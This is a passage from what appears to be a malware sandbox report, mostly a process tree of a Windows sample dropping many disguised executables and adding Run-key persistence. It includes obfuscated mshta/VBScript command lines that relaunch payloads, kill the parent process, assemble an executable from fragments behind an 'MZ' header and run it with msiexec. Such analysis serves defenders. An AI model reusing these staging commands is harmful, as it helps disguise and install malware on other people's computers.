                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5540
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 6100 -s 1704
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            PID:2236
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1220
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2952917.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2952917.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:4376
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6590434.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6590434.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            PID:3196
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6492
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4934134.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4934134.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8571651.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\8571651.exe"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:5900
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5601481.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5601481.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5396
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1349030.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1349030.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:6428
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\1349030.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\1349030.exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:6520
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\1349030.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" == "" for %P in ( "C:\Users\Admin\AppData\Roaming\1349030.exe") do taskkill -F /IM "%~nxP"
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:840
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe
                                                                                                                                                                                                                          ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X
                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                            PID:6900
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )
                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                PID:5588
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " == "" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:6980
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRipt: cLosE ( creATEoBJEct ( "wscRIPT.SHEll" ). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " , 0 , TRUE ) )
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                    PID:5532
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y & cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo
                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                        PID:2508
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5552
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"
                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                            PID:4648
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                            msiexec.exe -Y ..\Ff7k4.sIo
                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:2068
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill -F /IM "1349030.exe"
                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:7000
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4084537.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4084537.exe"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1456
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 296
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:3988
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6228380.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6228380.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              PID:3296
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4257927.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4257927.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2852
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 292
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:3232
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:1180
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:3128
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:6720
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5480
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:3540
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:5608
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5596
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:5240
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:6432
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                    PID:6840
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                          PID:5256
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                          msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:4072
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                    PID:4520
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:2632
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 196
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                PID:3608
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:5188
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              PID:5144
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                PID:6104
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--yry0yD"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                  PID:3540
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffd409cdec0,0x7ffd409cded0,0x7ffd409cdee0
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:6100
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:2
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:6424
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=1932 /prefetch:8
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:1420
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2708 /prefetch:1
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:6660
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2704 /prefetch:1
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:948
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3012 /prefetch:8
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:2228
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2572 /prefetch:8
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:5744
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3252 /prefetch:2
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:6268
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3800 /prefetch:8
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:1644
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=3256 /prefetch:8
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2120 /prefetch:8
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:2640
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,2473636139436771375,13643205253837149386,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3540_843837399" --mojo-platform-channel-handle=2132 /prefetch:8
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                    PID:1264
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:5880
                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
